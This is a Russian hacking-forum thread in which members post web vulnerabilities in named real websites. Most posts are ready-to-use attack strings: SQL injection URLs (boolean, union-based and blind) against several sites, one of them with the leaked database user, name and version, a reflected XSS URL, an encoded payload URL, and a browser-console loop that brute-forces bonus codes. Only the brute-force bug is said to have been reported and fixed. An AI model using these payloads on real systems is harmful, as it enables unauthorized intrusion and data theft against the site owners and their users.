Уязвимости SQLi, XSS и другие.

Обсуждение в разделе «Песочница», начал(-а) Егорыч+++, 10.05.2015.

  1. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
    Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
    Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
    Первое, авторизовываемся не через телефон, а средствами забытого пароля:
    [​IMG]
    Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.
    [​IMG]
    Далее тупо перебираем скриптом в консоле
    Code:
    for (var i = 800000; i < 800100; i++) { $('.bonus-text').val(i); $('.bonus-send').click(); }
    Что интересно под авторизацией через телефон дает только три попытки, а через средство забытого пароля без ввода телефона - без проблем сколько угодно, связано скорее всего с куками.
    Ну и профитик
    [​IMG]
    Репорт отправлен и на момент написания статьи уже пофикшено. А добрые ребятки отправили мне в благодарность много бесплатных кодов.
     
    _________________________
  2. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    710
    Одобрения:
    809
    Репутация:
    51
    #242 BabaDook, 25.10.2016
    В последний раз редактировалось: 26.10.2016
  3. pw0ned

    pw0ned Member

    Регистрация:
    8.01.2016
    Сообщения:
    121
    Одобрения:
    48
    Репутация:
    14
  4. MrFear41

    MrFear41 New Member

    Регистрация:
    11.12.2016
    Сообщения:
    3
    Одобрения:
    0
    Репутация:
    0
    Exploit :
    Boolean Based SQL Injection

    Code:
    http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns
     
  5. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    710
    Одобрения:
    809
    Репутация:
    51
  6. SeytaR

    SeytaR New Member

    Регистрация:
    7.04.2016
    Сообщения:
    7
    Одобрения:
    1
    Репутация:
    7
    Это одобряет Gorev.
  7. SeytaR

    SeytaR New Member

    Регистрация:
    7.04.2016
    Сообщения:
    7
    Одобрения:
    1
    Репутация:
    7
    #248 SeytaR, 4.02.2017
    В последний раз редактировалось модератором: 12.02.2017
  8. pw0ned

    pw0ned Member

    Регистрация:
    8.01.2016
    Сообщения:
    121
    Одобрения:
    48
    Репутация:
    14
  9. SeytaR

    SeytaR New Member

    Регистрация:
    7.04.2016
    Сообщения:
    7
    Одобрения:
    1
    Репутация:
    7
  10. SeytaR

    SeytaR New Member

    Регистрация:
    7.04.2016
    Сообщения:
    7
    Одобрения:
    1
    Репутация:
    7
    SQL INJECTION DRONES LAB

    https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX

    droneslab@localhost : droneslab_website : 10.1.18-MariaDB

    USER_PRIVILEGES:droneslab'@'localhost' -> NO
     
  11. pw0ned

    pw0ned Member

    Регистрация:
    8.01.2016
    Сообщения:
    121
    Одобрения:
    48
    Репутация:
    14
    Firefox

    Code:
    http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
    [​IMG]
     
    Это одобряют lolidoli и SeytaR.
  12. leksadin

    leksadin Level 8

    Регистрация:
    19.01.2016
    Сообщения:
    117
    Одобрения:
    47
    Репутация:
    2
    Blind SQL injection

    agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
    В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

    Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки (<, >) весь остальной текст удаляется.
     
    #253 leksadin, 10.02.2017
    В последний раз редактировалось: 17.02.2017
  13. SaNDER

    SaNDER Member

    Регистрация:
    9.07.2015
    Сообщения:
    213
    Одобрения:
    15
    Репутация:
    3
  14. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
     
    _________________________
  15. leksadin

    leksadin Level 8

    Регистрация:
    19.01.2016
    Сообщения:
    117
    Одобрения:
    47
    Репутация:
    2

    Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.

    Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
     
  16. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.
     
    _________________________
    Это одобряет leksadin.
  17. SeytaR

    SeytaR New Member

    Регистрация:
    7.04.2016
    Сообщения:
    7
    Одобрения:
    1
    Репутация:
    7
  18. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    710
    Одобрения:
    809
    Репутация:
    51
    PHP:
    http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VGplNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkDNiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeVpmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZkWWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUTJWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2MoZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNVTHlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYHhHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRGSWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSNxmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRkSrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJpVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1UMSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVWxWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cnWEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYtZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5UVWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dVRlTDFGbSVlUtRHa
    Есть ещё всяких много разных, если будет интерес буду выкладывать редко
     
    Это одобряют pastword и leksadin.
  19. pastword

    pastword New Member

    Регистрация:
    19.02.2017
    Сообщения:
    18
    Одобрения:
    0
    Репутация:
    0
    интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.
     
    #260 pastword, 16.03.2017
    В последний раз редактировалось: 17.03.2017
Загрузка...